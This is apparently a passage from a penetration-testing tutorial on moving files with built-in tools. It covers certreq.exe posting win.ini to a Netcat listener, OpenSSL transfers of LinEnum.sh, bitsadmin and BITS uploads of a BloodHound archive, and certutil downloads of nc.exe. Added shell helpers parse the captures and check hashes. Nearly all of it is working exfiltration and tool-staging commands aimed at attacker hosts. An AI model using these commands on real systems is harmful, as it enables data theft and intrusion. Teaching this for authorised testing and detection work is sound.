To search for download and upload functions in LOLBAS we can use
We need to listen on a port on our attack host for incoming traffic with Netcat, then execute certreq.exe on the Windows host to POST a file to that listener.
Upload win.ini to our attack host
C:\xyz> certreq.exe -Post -config http://192.168.49.128/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
This sends the file as the body of an HTTP POST to our Netcat session, where we can copy-paste its contents. The timeout error on the Windows side is expected: certreq waits for an HTTP response that Netcat never sends, but by then the request body has already been delivered.
File Received in our Netcat Session
neutron@kali[/kali]$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)
Content-Length: 92
Host: 192.168.49.128

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
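Copy-pasting out of the Netcat window does not scale and gives no hint when the upload was cut short. The script below is an added example, not code from the original page: it redirects the Netcat capture to a file, strips the request line and headers, and accepts the result only if its size matches the declared Content-Length. It assumes a POSIX shell with sed and wc; the capture path, function names and the sample capture (constructed from the request above, with the CRLF line endings Windows actually sends) are mine.

```shell
#!/bin/sh
# Added example (not from the original page): turn a raw certreq.exe POST
# captured by Netcat into the uploaded file and check that nothing is missing.
#
# In practice the capture comes from the listener:
#   sudo nc -lnvp 80 > /tmp/upload.http
# and is then unpacked with:
#   save_upload /tmp/upload.http win.ini

# A literal carriage return; Windows sends CRLF line endings and Netcat
# writes the bytes exactly as received.
CR=$(printf '\r')

# Request body = everything after the first empty line (CRLF or bare LF).
http_body() {
    sed "1,/^$CR\{0,1\}\$/d" "$1"
}

# Content-Length as declared in the header block (header names are
# case-insensitive; the .* swallows the trailing CR).
content_length() {
    sed -n "1,/^$CR\{0,1\}\$/s/^[Cc]ontent-[Ll]ength:[[:space:]]*\([0-9][0-9]*\).*/\1/p" "$1"
}

# Write the body to "$2" and succeed only if its size matches Content-Length.
# A mismatch means the capture was cut short, for example because certreq
# gave up (Netcat never sends an HTTP response, hence the client-side timeout)
# before the whole body went out.
save_upload() {
    cap="$1"; out="$2"
    http_body "$cap" > "$out"
    want=$(content_length "$cap")
    got=$(wc -c < "$out" | tr -d ' ')
    [ -n "$want" ] && [ "$want" = "$got" ]
}

# Constructed sample: the request from the Netcat session above, with the
# 92-byte win.ini body written using CRLF line endings (which is exactly
# what makes the declared Content-Length of 92 add up).
write_sample_capture() {
    printf 'POST / HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nContent-Type: application/json\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)\r\nContent-Length: 92\r\nHost: 192.168.49.128\r\n\r\n' > "$1"
    printf '; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1\r\n' >> "$1"
}
```

The Content-Length check is the part worth keeping: certreq's timeout does not tell you whether the body went out completely, and a binary that arrives one chunk short will simply not run on the other side.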
To search for the download and upload functions in GTFOBins for Linux binaries, we can use
+file download or
OpenSSL itself can move a file over TLS. We need to create a self-signed certificate and start a server on our attack host, then pull the file with the OpenSSL client from the compromised machine.
Create Certificate on our attack host
neutron@kali[/kali]$ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
Generating a RSA private key
.......................................................................................................+++++
................+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) :
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) :
Common Name (e.g. server FQDN or YOUR name) :
Email Address :
Stand up the Server on our attack host
neutron@kali[/kali]$ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
With the server running, we connect to it from the compromised machine and redirect what the client receives into a file. Note that s_client does not reject an unknown server certificate by default, so this channel is encrypted but the server is not authenticated; comparing the certificate fingerprint, and a hash of the file on both ends once it has arrived, closes that gap.
neutron@kali[/kali]$ openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh
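The helpers below are an added example, not code from the original page. They cover what the procedure above leaves out: the certificate step in a non-interactive form (-subj answers the Distinguished Name prompts, which matters when you are typing into a reverse shell), the server certificate's SHA-256 fingerprint so the target side can confirm it is talking to our s_server and not something in the path, and a hash comparison of the file on both ends. It assumes the openssl and sha256sum binaries are available; the directory layout, the CN and the function names are mine. The s_server and s_client commands appear only in comments, as on the page, since they need two hosts.

```shell
#!/bin/sh
# Added example (not from the original page): non-interactive certificate
# generation plus the integrity checks around the s_server / s_client transfer.
#
# The transfer itself, as on the page (needs two hosts, so only shown here):
#   attack host:  openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
#   target:       openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh

# Same as the interactive "openssl req" on the page, but -subj supplies the
# Distinguished Name so no prompts appear. "transfer" is an arbitrary CN.
make_cert() {
    dir="$1"
    openssl req -newkey rsa:2048 -nodes -keyout "$dir/key.pem" \
        -x509 -days 365 -subj '/CN=transfer' -out "$dir/certificate.pem" 2>/dev/null
}

# SHA-256 fingerprint of the server certificate (colon-separated hex).
# s_client accepts any certificate by default, so the channel is encrypted
# but the peer is not authenticated. Print this on the attack host and compare
# it with what the target sees from:
#   openssl s_client -connect HOST:PORT </dev/null 2>/dev/null | openssl x509 -noout -fingerprint -sha256
cert_fingerprint() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 | sed 's/^[^=]*=//'
}

# Hash of a transferred file; run on both ends and compare the output.
file_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# Returns 0 only if the received copy is byte-for-byte the original.
verify_transfer() {
    [ "$(file_sha256 "$1")" = "$(file_sha256 "$2")" ]
}
```

The fingerprint comparison is cheap and is the only authentication this setup has: the certificate is self-signed, so nothing else distinguishes our server from an interceptor that terminates TLS and re-encrypts.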
Other common Living off the Land tools
Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It "intelligently" takes host and network utilization into account to minimize the impact on a user's foreground work. The bitsadmin tool is deprecated in favor of the PowerShell BITS cmdlets but is still present on current Windows builds; BITS jobs are recorded in the Microsoft-Windows-Bits-Client/Operational event log, which is where defenders tend to look for them.
File Download with Bitsadmin
PS C:\xyz> bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe
PowerShell also enables interaction with BITS through the BitsTransfer module: it supports file downloads and uploads, credentials, and specified proxy servers.
PS C:\xyz> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32/nc.exe" -Destination "C:\Temp\nc.exe"
PS C:\xyz> Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://10.10.10.132/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential LEGALCORP\svc-sql
Certutil is available in all Windows versions, serving as a de facto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.
Download a File with Certutil
C:\xyz> certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe